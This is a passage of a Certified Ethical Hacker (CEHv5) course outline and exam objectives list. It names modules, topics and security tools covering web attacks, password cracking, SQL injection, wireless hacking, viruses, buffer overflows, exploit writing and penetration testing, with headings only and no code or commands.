Patch Management Tool
o Qfecheck
o HFNetChk
cacls.exe Utility
Vulnerability Scanners
Online Vulnerability Search Engine
Network Tools
o Whisker
o N-Stealth HTTP Vulnerability Scanner
Hacking Tool: WebInspect
Network Tool: Shadow Security Scanner
SecureIIS
Countermeasures
File System Traversal Countermeasures
Increasing Web Server Security
Web Server Protection Checklist
Module 12: Web Application Vulnerabilities
Web Application Setup
Web Application Hacking
Anatomy of an Attack
Web Application Threats
Cross-Site Scripting/XSS Flaws
o Countermeasures
SQL Injection
Command Injection Flaws
o Countermeasures
Cookie/Session Poisoning
o Countermeasures
Parameter/Form Tampering
Buffer Overflow
o Countermeasures
Directory Traversal/Forceful Browsing
o Countermeasures
Cryptographic Interception
Cookie Snooping
Authentication Hijacking
o Countermeasures
Log Tampering
Error Message Interception
Attack Obfuscation
Platform Exploits
DMZ Protocol Attacks
o Countermeasures
Security Management Exploits
Web Services Attacks
Zero-Day Attacks
Network Access Attacks
TCP Fragmentation
Hacking Tools
o Instant Source
o Wget
o WebSleuth
o BlackWidow
o WindowBomb
o Burp
o cURL
o dotDefender
o Google Hacking
o Acunetix Web Scanner
o AppScan – Web Application Scanner
o AccessDiver
Module 13: Web-based Password Cracking Techniques
Definition of Authentication
Authentication Mechanisms
o HTTP Authentication
• Basic Authentication
• Digest Authentication
o Integrated Windows (NTLM) Authentication
o Negotiate Authentication
o Certificate-based Authentication
o Forms-based Authentication
o RSA Secure Token
o Biometrics
• Face recognition
• Iris scanning
• Retina scanning
• Fingerprinting
• Hand geometry
• Voice recognition
How to Select a Good Password?
Things to Avoid in Passwords
Changing Your Password
Protecting Your Password
How Hackers get hold of Passwords?
Windows XP: Remove Saved Passwords
Microsoft Password Checker
What is a Password Cracker?
Modus Operandi of an Attacker Using Password Cracker
How does a Password Cracker Work?
Classification of Attacks
Password Guessing
Query String
Cookies
Dictionary Maker
Available Password Crackers
o L0phtCrack
o John The Ripper
o Brutus
Hacking Tools
o Obiwan
o Authforce
o Hydra
o Cain And Abel
o RAR
o Gammaprog
o WebCracker
o Munga Bunga
o PassList
o SnadBoy
o WinSSLMiM
o ReadCookies.html
o Wireless WEP Key Password Spy
o RockXP
o Password Spectator
Countermeasures
Module 14: SQL Injection
Introducing SQL injection
Exploiting Web Applications
SQL Injection Steps
o What Should You Look For?
o What If It Doesn’t Take Input?
o OLE DB Errors
o Input Validation Attack
SQL Injection Techniques
How to Test for SQL Injection Vulnerability?
How does it Work?
Executing Operating System Commands
Getting Output of SQL Query
Getting Data from the Database Using ODBC Error Message
How to Mine all Column Names of a Table?
How to Retrieve any Data?
How to Update/Insert Data into Database?
Automated SQL Injection Tool
o AutoMagic SQL
o Absinthe
SQL Injection in Oracle
SQL Injection in MySQL Database
Attack against SQL Servers
SQL Server Resolution Service (SSRS)
Osql -L Probing
SQL Injection Automated Tools
o SQLDict
o SqlExec
o SQLbf
o SQLSmack
o SQL2.exe
SQL Injection Countermeasures
Preventing SQL Injection Attacks
SQL Injection Blocking Tool: SQLBlock
Acunetix Web Vulnerability Scanner
Module 15: Hacking Wireless Networks
Introduction to Wireless Networking
Wired Network vs. Wireless Network
Effects of Wireless Attacks on Business
Types of Wireless Networks
Advantages and Disadvantages of a Wireless Network
Wireless Standards
o 802.11a
o 802.11b – “WiFi”
o 802.11g
o 802.11i
o 802.11n
Related Technology and Carrier Networks
Antennas
Cantenna
Wireless Access Points
SSID
Beacon Frames
Is the SSID a Secret?
Setting Up a WLAN
Detecting a Wireless Network
How to Access a WLAN
Terminologies
Authentication and Association
Authentication Modes
Authentication and (Dis)Association Attacks
Rogue Access Points
Tools to Generate Rogue Access Points: Fake AP
Tools to Detect Rogue Access Points: Netstumbler
Tools to Detect Rogue Access Points: MiniStumbler
Wired Equivalent Privacy (WEP)
What is WPA?
WPA Vulnerabilities
WEP, WPA, and WPA2
Steps for Hacking Wireless Networks
o Step 1: Find networks to attack
o Step 2: Choose the network to attack
o Step 3: Analyze the network
o Step 4: Crack the WEP key
o Step 5: Sniff the network
Cracking WEP
Weak Keys (a.k.a. Weak IVs)
Problems with WEP’s Key Stream and Reuse
Automated WEP Crackers
Pad-Collection Attacks
XOR Encryption
Stream Cipher
WEP Tools
o Aircrack
o AirSnort
o WEPCrack
o WepLab
Temporal Key Integrity Protocol (TKIP)
LEAP: The Lightweight Extensible Authentication Protocol
LEAP Attacks
MAC Sniffing and AP Spoofing
Tool to Detect MAC Address Spoofing: Wellenreiter V2
Man-in-the-Middle Attack (MITM)
Denial-of-Service Attacks
DoS Attack Tool: Fatajack
Phone Jammers
Scanning Tools
o Redfang 2.5
o Kismet
o THC-WarDrive
o PrismStumbler
o MacStumbler
o Mognet
o WaveStumbler
o StumbVerter
o Netchaser V1.0 for Palm Tops
o AP Scanner
o SSID Sniff
o Wavemon
o Wireless Security Auditor (WSA)
o AirTraf
o Wifi Finder
o AirMagnet
Sniffing Tools
o AiroPeek
o NAI Wireless Sniffer
o Ethereal
o Aerosol v0.65
o vxSniffer
o EtherPEG
o DriftNet
o AirMagnet
o WinDump
o ssidsniff
Multiuse Tool: THC-RUT
PCR-PRO-1k Hardware Scanner
Tools
o WinPcap
o AirPcap
Securing Wireless Networks
Auditing Tool: BSD-Airtools
AirDefense Guard
WIDZ: Wireless Intrusion Detection System
Radius: Used as Additional Layer in Security
Google Secure Access
Module 16: Virus and Worms
Introduction to Virus
Virus History
Characteristics of a Virus
Working of Virus
o Infection Phase
o Attack Phase
Why Do People Create Computer Viruses?
Symptoms of Virus-Like Attack
Virus Hoaxes
Chain Letters
How is a Worm different from a Virus?
Indications of Virus Attack
Hardware Threats
Software Threats
Virus Damage
Modes of Virus Infection
Stages of Virus Life
Virus Classification
How does a Virus Infect?
Storage Patterns of a Virus
System Sector Viruses
Stealth Virus
Bootable CD-ROM Virus
Self-Modification
Encryption with a Variable Key
Polymorphic Code
Viruses
o Metamorphic Virus
o Cavity Virus
o Sparse Infector Virus
o Companion Virus
o File Extension Virus
o I Love You Virus
o Melissa Virus
Famous Virus/Worms – JS.Spth
Klez Virus Analysis
Writing a Simple Virus Program
Virus Construction Kits
Virus Detection Methods
Virus Incident Response
What is Sheep Dip?
Sheep Dip Computer
Virus Analysis - IDA Pro Tool
Prevention is Better than Cure
Latest Viruses
Top 10 Viruses - 2006
Anti-Virus Software
o AVG Free Edition
o Norton Antivirus
o McAfee
Socketshield
Popular Anti-Virus Packages
Virus Databases
Module 17: Physical Security
Security Statistics
Physical Security Breach Incidents
Understanding Physical Security
What Is the Need for Physical Security?
Who Is Accountable for Physical Security?
Factors Affecting Physical Security
Physical Security Checklist
o Company surroundings
o Premises
o Reception
o Server
o Workstation area
o Wireless access points
o Other equipment, such as fax machines and removable media
o Access control
o Biometric Devices
o Smart Cards
o Security Token
o Computer equipment maintenance
o Wiretapping
o Remote access
o Locks
Information Security
EPS (Electronic Physical Security)
Wireless Security
Laptop Theft: Security Statistics
Laptop Theft
Laptop Security Tools
Laptop Tracker - XTool Computer Tracker
Tools to Locate Stolen Laptops
Stop's Unique, Tamper-proof Patented Plate
Tool: TrueCrypt
Laptop Security Countermeasures
Mantrap
TEMPEST
Challenges in Ensuring Physical Security
Spyware Technologies
Spying Devices
Physical Security: Lock Down USB Ports
Tool: DeviceLock
Blocking the Use of USB Storage Devices
Track Stick GPS Tracking Device
Module 18: Linux Hacking
Why Linux?
Linux Distributions
Linux – Basics
Linux Live CD-ROMs
Basic Commands of Linux
Linux File Structure
Linux Networking Commands
Directories in Linux
Compiling the Linux Kernel
How to Install a Kernel Patch?
Compiling Programs in Linux
GCC Commands
Make Install Command
Linux Vulnerabilities
Chrooting
Why is Linux Hacked?
Linux Vulnerabilities in 2005
How to Apply Patches to Vulnerable Programs?
Scanning Networks
Tools
o Nmap in Linux
o Scanning Tool: Nessus
o Tool: Cheops
o Port Scan Detection Tools
Password Cracking in Linux
Firewall in Linux: IPTables
Basic Linux Operating System Defense
SARA (Security Auditor's Research Assistant)
Linux Tool
o Netcat
o tcpdump
o Snort
o SAINT
o Ethereal
o Abacus Port Sentry
o DSniff Collection
o Hping2
o Sniffit
o Nemesis
o LSOF
o IPTraf
o LIDS
o Hunt
o TCP Wrappers
Linux Loadable Kernel Modules
Hacking Tool: Linux Rootkits
Rootkits
o Knark
o Torn
o Tuxit
o Adore
o Ramen
o Beastkit
Rootkit Countermeasures
Linux Tools: Application Security
Advanced Intrusion Detection Environment (AIDE)
Linux Tools
o Security Testing Tools
o Encryption
o Log and Traffic Monitors
o Security Auditing Tool (LSAT)
Linux Security Countermeasures
Steps for Hardening Linux
Module 19: Evading IDS, Firewalls, and Honeypots
Introduction to Intrusion Detection Systems
Terminologies
o Intrusion Detection System (IDS)
• IDS Placement
• Ways to Detect an Intrusion
• Types of Intrusion Detection Systems
• System Integrity Verifiers (SIV)
• Tripwire
• Cisco Security Agent (CSA)
• Signature Analysis
• General Indications of Intrusion: System Indications
• General Indications of Intrusion: File System Indications
• General Indications of Intrusion: Network Indications
• Intrusion Detection Tools
• Snort 2.x
• Steps to Perform After an IDS Detects an Attack
• Evading IDS Systems
• Ways to Evade IDS
• Tools to Evade IDS
• IDS Evading Tool: ADMutate
• Packet Generators
o Firewall
• What is a Firewall?
• What does a Firewall do?
• Packet Filtering
• What can't a Firewall do?
• How does a Firewall Work?
• Firewall Operations
• Hardware Firewall
• Software Firewall
• Types of Firewalls
• Packet Filtering Firewall
• IP Packet Filtering Firewall
• Circuit-Level Gateway
• TCP Packet Filtering Firewall
• Application-Level Firewall
• Application Packet Filtering Firewall
• Stateful Multilayer Inspection Firewall
• Firewall Identification
• Firewalking
• Banner Grabbing
• Breaching Firewalls
• Bypassing a Firewall Using HTTP Tunnel
• Placing Backdoors Through Firewalls
• Hiding behind a Covert Channel: LOKI
• ACK Tunneling
• Tools to Breach Firewalls
• Common Tool for Testing Firewall & IDS
• IDS Informer
• Evasion Gateway
• Firewall Informer
o Honeypot
• What is a Honeypot?
• The Honeynet Project
• Types of Honeypots
• Advantages and Disadvantages of a Honeypot
• Where to Place a Honeypot?
• Honeypots
• SPECTER
• honeyd
• KFSensor
• Sebek
• Physical and Virtual Honeypots
• Tools to Detect Honeypots
• What to do When Hacked?
Module 20: Buffer Overflows
Why are Programs/Applications Vulnerable?
Buffer Overflows
Reasons for Buffer Overflow Attacks
Knowledge Required to Program Buffer Overflow Exploits
Types of Buffer Overflows
o Stack-based Buffer Overflow
• Understanding Assembly Language
• Understanding Stacks
• Shellcode
o Heap/BSS-based Buffer Overflow
How to Detect Buffer Overflows in a Program
Attacking a Real Program
NOPS
How to Mutate a Buffer Overflow Exploit
Defense Against Buffer Overflows
Tool to Defend Buffer Overflow
o Return Address Defender (RAD)
o StackGuard
o Immunix System
Vulnerability Search – ICAT
Simple Buffer Overflow in C
Code Analysis
Module 21: Cryptography
Public-key Cryptography
Working of Encryption
Digital Signature
RSA (Rivest Shamir Adleman)
RC4, RC5, RC6, Blowfish
Algorithms and Security
Brute-Force Attack
RSA Attacks
Message Digest Functions
One-way Hash Functions
MD5
SHA (Secure Hash Algorithm)
SSL (Secure Sockets Layer)
RC5
What is SSH?
SSH (Secure Shell)
Government Access to Keys (GAK)
RSA Challenge
distributed.net
Cleversafe Grid Builder
PGP (Pretty Good Privacy)
Code Breaking: Methodologies
Cryptography Attacks
Disk Encryption
Hacking Tool
o PGP Crack
o Magic Lantern
o WEPCrack
o Cracking S/MIME Encryption Using Idle CPU Time
o CypherCalc
o Command Line Scriptor
o CryptoHeaven
Module 22: Penetration Testing
Introduction to Penetration Testing
Categories of Security Assessments
Vulnerability Assessment
Limitations of Vulnerability Assessment
Types of Penetration Testing
Risk Management
Do-it-Yourself Testing
Outsourcing Penetration Testing Services
Terms of Engagement
Project Scope
Pentest Service Level Agreements
Testing Points
Testing Locations
Automated Testing
Manual Testing
Using DNS Domain Name and IP Address Information
Enumerating Information about Hosts on Publicly-Available Networks
Testing Network-Filtering Devices
Enumerating Devices
Denial of Service Emulation
Tools
o Appscan
o HackerShield
o Cerberus Internet Scanner
o Cybercop Scanner
o FoundScan Hardware Appliances
o Nessus
o NetRecon
o SAINT
o SecureNET Pro
o SecureScan
o SATAN
o SARA
o Security Analyzer
o STAT Analyzer
o VigilENT
o WebInspect
Evaluating Different Types of Pentest Tools
Asset Audit
Fault Trees and Attack Trees
GAP Analysis
Threat
Business Impact of Threat
Internal Metrics Threat
External Metrics Threat
Calculating Relative Criticality
Test Dependencies
Defect Tracking Tools
o Web-based Bug/Defect Tracking Software
o SWB Tracker
o Advanced Defect Tracking Web Edition
Disk Replication Tools
o Snapback DUP
o Daffodil Replicator
o Image MASSter 4002i
DNS Zone Transfer Testing Tools
o DNS analyzer
o Spam blacklist
Network Auditing Tools
o eTrust Audit (AUDIT LOG REPOSITORY)
o iInventory
o Centennial Discovery
Trace Route Tools and Services
o Ip Tracer 1.3
o Trellian Trace Route
Network Sniffing Tools
o Sniff’em
o PromiScan
Denial-of-Service Emulation Tools
o FlameThrower®
o Mercury LoadRunner™
o ClearSight Analyzer
Traditional Load Testing Tools
o WebMux
o SilkPerformer
o PORTENT Supreme
System Software Assessment Tools
o Database Scanner
o System Scanner
o Internet Scanner
Operating System Protection Tools
o Bastille Linux
o Engarde Secure Linux
Fingerprinting Tools
o Foundstone
o @Stake LC 5
Port Scanning Tools
o Superscan
o Advanced Port Scanner
o AW Security Port Scanner
Directory and File Access Control Tools
o Abyss Web Server for Windows
o GFI LANguard Portable Storage Control
o Windows Security Officer - wso
File Share Scanning Tools
o Infiltrator Network Security Scanner
o Encrypted FTP 3
Password Directories
o Passphrase Keeper 2.60
o IISProtect
Password Guessing Tools
o Webmaster Password Generator
o Internet Explorer Password Recovery Master
o Password Recovery Toolbox
Link Checking Tools
o Alert Link Runner
o Link Utility
o LinxExplorer
Web Testing-based Scripting Tools
o Svoi.NET PHP Edit
o OptiPerl
o Blueprint Software Web Scripting Editor
Buffer Overflow Protection Tools
o StackGuard
o FormatGuard
o RaceGuard
File Encryption Tools
o Maxcrypt
o Secure IT
o Steganos
Database Assessment Tools
o EMS MySQL Manager
o SQL Server Compare
o SQL Stripes
Keyboard Logging and Screen Recording Tools
o Spector Professional 5.0
o Handy Keylogger
o Snapshot Spy
System Event Logging and Reviewing Tools
o LT Auditor Version 8.0
o ZVisual RACF
o Network Intelligence Engine LS Series
Tripwire and Checksum Tools
o SecurityExpressions
o MD5
o Tripwire for Servers
Mobile-Code Scanning Tools
o Vital Security
o E Trust Secure Content Manager 1.1
o Internet Explorer Zones
Centralized Security Monitoring Tools
o ASAP eSMART™ Software Usage by ASAP Software
o WatchGuard VPN Manager
o Harvester
Web Log Analysis Tools
o AWStats
o Azure Web Log
o Summary
Forensic Data and Collection Tools
o Encase tool
o SafeBack
o ILook Investigator
Security Assessment Tools
o Nessus Windows Technology
o NetIQ Security Manager
o STAT Scanner
Multiple OS Management Tools
o Multiple Boot Manager
o Acronis OS Selector
o Eon
Phases of Penetration Testing
o Pre-Attack Phase
o Attack Phase
o Post-Attack Phase
Penetration Testing Deliverables Templates
SELF-STUDY MODULES
Covert Hacking
Insider attacks
What is covert channel?
Security Breach
Why Do You Want to Use Covert Channel?
Motivation of a Firewall Bypass
Covert Channels Scope
Covert Channel: Attack Techniques
Simple Covert Attacks
Advanced Covert Attacks
Reverse Connecting Agents
Covert Channel Attack Tools
o Netcat
o DNS tunnel
o DNS Tunneling
• Covert Channel Using DNS Tunneling
• DNS Tunnel Client
• DNS Tunneling Countermeasures
o SSH reverse tunnel
• Covert Channel Using SSH
• Covert Channel using SSH (Advanced)
o HTTP/S Tunneling Attack
o Covert Channel Hacking Tool: Active Port Forwarder
o Covert Channel Hacking Tool: CCTT
o Covert Channel Hacking Tool: Firepass
o Covert Channel Hacking Tool: MsnShell
o Covert Channel Hacking Tool: Web Shell
o Covert Channel Hacking Tool: NCovert
o Covert Channel Hacking via Spam E-mail Messages
o Hydan
o Covert Channel Hacking Tool: NCOVERT
Writing Virus Codes
Introduction of Virus
Types of Viruses
Symptoms of a Virus Attack
Prerequisites for Writing Viruses
Required Tools and Utilities
Virus Infection Flow Chart
o Step – I Finding file to infect
• Directory Traversal Method
• “dot dot” Method
o Step – II Check viruses infection criteria
o Step – III Check for previous infection
• Marking a File for Infection
o Step – IV Infect the file
o Step – V Covering tracks
Components of Viruses
Functioning of Replicator part
Diagrammatical representation
Writing Replicator
Writing Concealer
Dispatcher
Writing Bomb/Payload
Trigger Mechanism
Brute Force Logic Bombs
Testing Virus Codes
Tips for Better Virus Writing
Assembly Language Tutorial
Number System
Base 10 System
Base 2 System
Decimal 0 to 15 in Binary
Binary Addition (C stands for Carry)
Hexadecimal Number
Hex Example
Hex Conversion
Nibble
Computer memory
Characters Coding
ASCII and UNICODE
CPU
Machine Language
Compilers
Clock Cycle
Original Registers
Instruction Pointer
Pentium Processor
Interrupts
Interrupt handler
External interrupts and Internal interrupts
Handlers
Machine Language
Assembly Language
Assembler
Assembly Language Vs High-level Language
Assembly Language Compilers
Instruction operands
MOV instruction
ADD instruction
SUB instruction
INC and DEC instructions
Directive
Preprocessor
equ directive
%define directive
Data directives
Labels
Input and output
C Interface
Call
Creating a Program
Why should anyone learn assembly at all?
o First.asm
Assembling the code
Compiling the C code
Linking the object files
Understanding an assembly listing file
Big and Little Endian Representation
Skeleton File
Working with Integers
Signed integers
Signed Magnitude
Two’s Complement
If statements
Do while loops
Indirect addressing
Subprogram
The Stack
The SS segment
ESP
The Stack Usage
The CALL and RET Instructions
General subprogram form
Local variables on the stack
General subprogram form with local variables
Multi-module program
Saving registers
Labels of functions
Calculating addresses of local variables
Exploit Writing
Exploits Overview
Prerequisites for Writing Exploits and Shellcodes
Purpose of Exploit Writing
Types of Exploits
o Stack Overflow
o Heap Corruption
o Format String
o Integer Bug Exploits
o Race Condition
o TCP/IP Attack
The Proof-of-Concept and Commercial Grade Exploit
Converting a Proof of Concept Exploit to Commercial Grade Exploit
Attack Methodologies
Socket Binding Exploits
Tools for Exploit Writing
o LibExploit
o Metasploit
o CANVAS
Steps for Writing an Exploit
Differences Between Windows and Linux Exploits
Shellcodes
o NULL Byte
o Types of Shellcodes
Tools Used for Shellcode Development
o NASM
o GDB
o objdump
o ktrace
o strace
o readelf
Steps for Writing a Shellcode
Issues Involved With Shellcode Writing
o Addressing problem
o Null byte problem
o System call implementation
Smashing the Stack for Fun and Profit
What is a Buffer?
Static Vs Dynamic Variables
Stack Buffers
Data Region
Memory Process Regions
What Is A Stack?
Why Do We Use A Stack?
The Stack Region
Stack frame
Stack pointer
Procedure Call (Procedure Prolog)
Compiling the code to assembly
Call Statement
Return Address (RET)
Word Size
Stack
Buffer Overflows
Error
Why do we get a segmentation violation?
Segmentation Error
Instruction Jump
Guess Key Parameters
Calculation
Shell Code
o The code to spawn a shell in C
Let's try to understand what is going on here. We'll start by studying main:
execve()
o execve() system call
exit.c
o List of steps with exit call
The code in Assembly
JMP
Code using indexed addressing
Offset calculation
shellcodeasm.c
testsc.c
Compile the code
NULL byte
shellcodeasm2.c
testsc2.c
Writing an Exploit
overflow1.c
Compiling the code
sp.c
vulnerable.c
NOPs
o Using NOPs
o Estimating the Location
Windows Based Buffer Overflow Exploit Writing
Buffer Overflow
Stack overflow
Writing Windows Based Exploits
Exploiting stack based buffer overflow
OpenDataSource Buffer Overflow Vulnerability Details
Simple Proof of Concept
Windbg.exe
Analysis
EIP Register
o Location of EIP
o EIP
Execution Flow
But where can we jump to?
Offset Address
The Query
Finding jmp esp
Debug.exe
listdlls.exe
Msvcrt.dll
Out.sql
The payload
ESP
Limited Space
Getting Windows API/function absolute address
Memory Address
Other Addresses
Compile the program
Final Code
Reverse Engineering
Positive Applications of Reverse Engineering
Ethical Reverse Engineering
World War Case Study
DMCA Act
What is Disassembler?
Why do you need to decompile?
Professional Disassembler Tools
Tool: IDA Pro
Convert Machine Code to Assembly Code
Decompilers
Program Obfuscation
Convert Assembly Code to C++ code
Machine Decompilers
Tool: dcc
Machine Code of compute.exe Program
Assembly Code of compute.exe Program
Code Produced by the dcc Decompiler in C
Tool: Boomerang
What Boomerang Can Do?
Andromeda Decompiler
Tool: REC Decompiler
Tool: EXE To C Decompiler
Delphi Decompilers
Tools for Decompiling .NET Applications
Salamander .NET Decompiler
Tool: LSW DotNet-Reflection-Browser
Tool: Reflector
Tool: Spices NET.Decompiler
Tool: Decompilers.NET
.NET Obfuscator and .NET Obfuscation
Java Bytecode Decompilers
Tool: JODE Java Decompiler
Tool: JREVERSEPRO
Tool: SourceAgain
Tool: ClassCracker
Python Decompilers
Reverse Engineering Tutorial
OllyDbg Debugger
How Does OllyDbg Work?
Debugging a Simple Console Application
• The exam codes EC0-350 and 312-50 refer to the same exam.
• The exam titles "Certified Ethical Hacker" and "Ethical Hacking and Countermeasures" refer to the same exam.
• VUE and Prometric systems use different exam codes.
• The CEHv4 exam has been retired since June 1st 2007
• CEHv5 exam is available on Prometric Prime, APTC and VUE.
• Exams at VUE and Prometric APTC require an Eligibility Code.
• Please visit http://www.eccouncil.org/takeexam.htm for details.
• Credit Towards Certification
Certified Ethical Hacker
Master of Security Science (MSS)
Skills Measured
The Exam 312-50 tests CEH candidates on the following 22 domains.
1. Ethics and Legal Issues
2. Footprinting
3. Scanning
4. Enumeration
5. System Hacking
6. Trojans and Backdoors
7. Sniffers
8. Denial of Service
9. Social Engineering
10. Session Hijacking
11. Hacking Web Servers
12. Web Application Vulnerabilities
13. Web Based Password Cracking Techniques
14. SQL Injection
15. Hacking Wireless Networks
16. Virus and Worms
17. Physical Security
18. Hacking Linux
19. IDS, Firewalls and Honeypots
20. Buffer Overflows
21. Cryptography
22. Penetration Testing Methodologies
Ethics and Legality
Understand Ethical Hacking terminology
Define the Job role of an ethical hacker
Understand the different phases involved in ethical hacking
Identify different types of hacking technologies
List the 5 stages of ethical hacking
What is hacktivism?
List different types of hacker classes
Define the skills required to become an ethical hacker
What is vulnerability research?
Describe the ways of conducting ethical hacking
Understand the Legal implications of hacking
Understand 18 U.S.C. § 1030 US Federal Law
Footprinting
Define the term Footprinting
Describe information gathering methodology
Describe competitive intelligence
Understand DNS enumeration
Understand Whois, ARIN lookup
Identify different types of DNS records
Understand how traceroute is used in Footprinting
Understand how e-mail tracking works
Understand how web spiders work
Scanning
Define the terms port scanning, network scanning, and vulnerability scanning
Understand the CEH scanning methodology
Understand Ping Sweep techniques
Understand nmap command switches
Understand SYN, Stealth, XMAS, NULL, IDLE and FIN scans
List TCP communication flag types
Understand War dialing techniques
Understand banner grabbing and OS fingerprinting techniques
Understand how proxy servers are used in launching an attack
How do anonymizers work?
Understand HTTP tunneling techniques
Understand IP spoofing techniques
Enumeration
What is Enumeration?
What is meant by null sessions?
What is SNMP enumeration?
What are the steps involved in performing enumeration?
System hacking
Understand password cracking techniques
Understand different types of passwords
Identify various password cracking tools
Understand escalating privileges
Understand keyloggers and other spyware technologies
Understand how to hide files
Understand rootkits
Understand steganography technologies
Understand how to cover your tracks and erase evidence
Trojans and Backdoors
What is a Trojan?
What is meant by overt and covert channels?
List the different types of Trojans
What are the indications of a Trojan attack?
Understand how “Netcat” Trojan works
What is meant by “wrapping”?
How do reverse-connecting Trojans work?
What are the countermeasure techniques in preventing Trojans?
Understand Trojan evading techniques
Sniffers
Understand the protocols susceptible to sniffing
Understand active and passive sniffing
Understand ARP poisoning
Understand Ethereal capture and display filters
Understand MAC flooding
Understand DNS spoofing techniques
Describe sniffing countermeasures
Denial of Service
Understand the types of DoS Attacks
Understand how DDoS attack works
Understand how BOTs/BOTNETS work
What is a “smurf” attack?
What is “SYN” flooding?
Describe the DoS/DDoS countermeasures
Social Engineering
What is Social Engineering?
What are the common types of attacks?
Understand Dumpster Diving
Understand Reverse Social Engineering
Understand Insider attacks
Understand Identity Theft
Describe Phishing Attacks
Understand Online Scams
Understand URL obfuscation
Social Engineering countermeasures
Session Hijacking
Understand Spoofing vs. Hijacking
List the types of Session Hijacking
Understand Sequence Prediction
What are the steps in performing session hijacking?
Describe how you would prevent session hijacking
Hacking Web Servers
List the types of web server vulnerabilities
Understand the attacks Against Web Servers
Understand IIS Unicode exploits
Understand patch management techniques
Understand Web Application Scanner
What is Metasploit Framework?
Describe Web Server hardening methods
Web Application Vulnerabilities
Understand how web applications work
Objectives of web application hacking
Anatomy of an attack
Web application threats
Understand Google hacking
Understand Web Application Countermeasures
Web Based Password Cracking Techniques
List the Authentication types
What is a Password Cracker?
How does a Password Cracker work?
Understand Password Attacks - Classification
Understand Password Cracking Countermeasures
SQL Injection
What is SQL injection?
Understand the Steps to conduct SQL injection
Understand SQL Server vulnerabilities
Describe SQL Injection countermeasures
Wireless Hacking
Overview of WEP, WPA authentication systems and cracking techniques
Overview of wireless Sniffers and SSID, MAC Spoofing
Understand Rogue Access Points
Understand Wireless hacking techniques
Describe the methods in securing wireless networks
Virus and Worms
Understand the difference between a virus and a worm
Understand the types of Viruses
How a virus spreads and infects the system
Understand antivirus evasion techniques
Understand Virus detection methods
Physical Security
Physical security breach incidents
Understanding physical security
What is the need for physical security?
Who is accountable for physical security?
Factors affecting physical security
Linux Hacking
Understand how to compile a Linux Kernel
Understand GCC compilation commands
Understand how to install LKM modules
Understand Linux hardening methods
Evading IDS, Honeypots and Firewalls
List the types of Intrusion Detection Systems and evasion techniques
List firewall and honeypot evasion techniques
Buffer Overflows
Overview of stack based buffer overflows
Identify the different types of buffer overflows and methods of detection
Overview of buffer overflow mutation techniques
Cryptography
Overview of cryptography and encryption techniques
Describe how public and private keys are generated
Overview of MD5, SHA, RC4, RC5, Blowfish algorithms
Penetration Testing Methodologies
Overview of penetration testing methodologies
List the penetration testing steps
Overview of the Pen-Test legal framework
Overview of the Pen-Test deliverables
List the automated penetration testing tools
Course Outline Version 5
Module 1: Introduction to Ethical Hacking
Why Security?
Essential Terminologies
Elements of Security
The Security, Functionality, and Ease of Use Triangle
What Does a Malicious Hacker Do?
o Reconnaissance
o Scanning
o Gaining access
o Maintaining access
o Covering Tracks
Types of Hacker Attacks
o Operating System attacks
o Application-level attacks
o Shrink Wrap code attacks
o Misconfiguration attacks
Hacktivism
Hacker Classes
Hacker Classes and Ethical Hacking
What Do Ethical Hackers Do?
Can Hacking be Ethical?
How to Become an Ethical Hacker?
Skill Profile of an Ethical Hacker
What is Vulnerability Research?
Why Hackers Need Vulnerability Research?
Vulnerability Research Tools
Vulnerability Research Websites
How to Conduct Ethical Hacking?
Approaches to Ethical Hacking
Ethical Hacking Testing
Ethical Hacking Deliverables
Computer Crimes and Implications
Legal Perspective
o U.S. Federal Law
o Japan’s Cyber Laws
o United Kingdom’s Cyber Laws
o Australia’s Cyber Laws
o Germany’s Cyber Laws
o Singapore’s Cyber Laws
Module 2: Footprinting
Revisiting Reconnaissance
Definition of Footprinting
Information Gathering Methodology
Unearthing Initial Information
Finding a Company’s URL
Internal URL
Extracting Archive of a Website
Google Search for Company’s Info.
People Search
Footprinting Through Job Sites
Passive Information Gathering
Competitive Intelligence Gathering
Why Do You Need Competitive Intelligence?
Companies Providing Competitive Intelligence Services
Competitive Intelligence
o When Did This Company Begin?
o How Did It Develop?
o What Are This Company's Plans?
o What Does Expert Opinion Say About The Company?
o Who Are The Leading Competitors?
Public and Private Websites
Tools
o DNS Enumerator
o SpiderFoot
o Sensepost Footprint Tools
• BiLE.pl
• BiLE-weigh.pl
• tld-expand.pl
• vet-IPrange.pl
• qtrace.pl
• vet-mx.pl
• jarf-rev
• jarf-dnsbrute
o Wikito Footprinting Tool
o Web Data Extractor Tool
o Whois
o Nslookup
o Necrosoft
o ARIN
o Traceroute
o Neo Trace
o GEOSpider
o Geowhere
o GoogleEarth
o VisualRoute Trace
o Kartoo Search Engine
o Touchgraph Visual Browser
o SmartWhois
o VisualRoute Mail Tracker
o eMailTrackerPro
o Read Notify
o HTTrack Web Site Copier
o Web Ripper
o robots.txt
o Website watcher
o E-mail Spider
o Power E-mail Collector Tool
Steps to Perform Footprinting
Module 3: Scanning
Definition of Scanning
Types of Scanning
o Port Scanning
o Network Scanning
o Vulnerability Scanning
Objectives of Scanning
CEH Scanning Methodology
o Check for live systems
• ICMP Scanning
• Angry IP
• HPING2
• Ping Sweep
• Firewalk
o Check for open ports
• Nmap
• TCP Communication Flags
• Three Way Handshake
• SYN Stealth / Half Open Scan
• Stealth Scan
• Xmas Scan
• FIN Scan
• NULL Scan
• IDLE Scan
• ICMP Echo Scanning/List Scan
• TCP Connect / Full Open Scan
• FTP Bounce Scan
• FTP Bounce Attack
• SYN/FIN Scanning Using IP Fragments
• UDP Scanning
• Reverse Ident Scanning
• RPC Scan
• Window Scan
• Blaster Scan
• PortScan Plus, Strobe
• IPSecScan
• NetScan Tools Pro
• WUPS – UDP Scanner
• SuperScan
• IPScanner
• MegaPing
• Global Network Inventory Scanner
• Net Tools Suite Pack
• FloppyScan
• War Dialer Technique
• Why War Dialing?
• Wardialing
• PhoneSweep
• THC Scan
• SandTrap Tool
o Banner grabbing/OS Fingerprinting
• OS Fingerprinting
• Active Stack Fingerprinting
• Passive Fingerprinting
• Active Banner Grabbing Using Telnet
• GET REQUESTS
• p0f – Banner Grabbing Tool
• p0f for Windows
• Httprint Banner Grabbing Tool
• Active Stack Fingerprinting
• XPROBE2
• RING V2
• Netcraft
• Disabling or Changing Banner
• Apache Server
• IIS Server
• IIS Lockdown Tool
• ServerMask
• Hiding File Extensions
• PageXchanger 2.0
o Identify Service
o Scan for Vulnerability
• Bidiblah Automated Scanner
• Qualys Web-based Scanner
• SAINT
• ISS Security Scanner
• Nessus
• GFI LANGuard
• SATAN (Security Administrator’s Tool for Analyzing Networks)
• Retina
• NIKTO
• SAFEsuite Internet Scanner
• IdentTCPScan
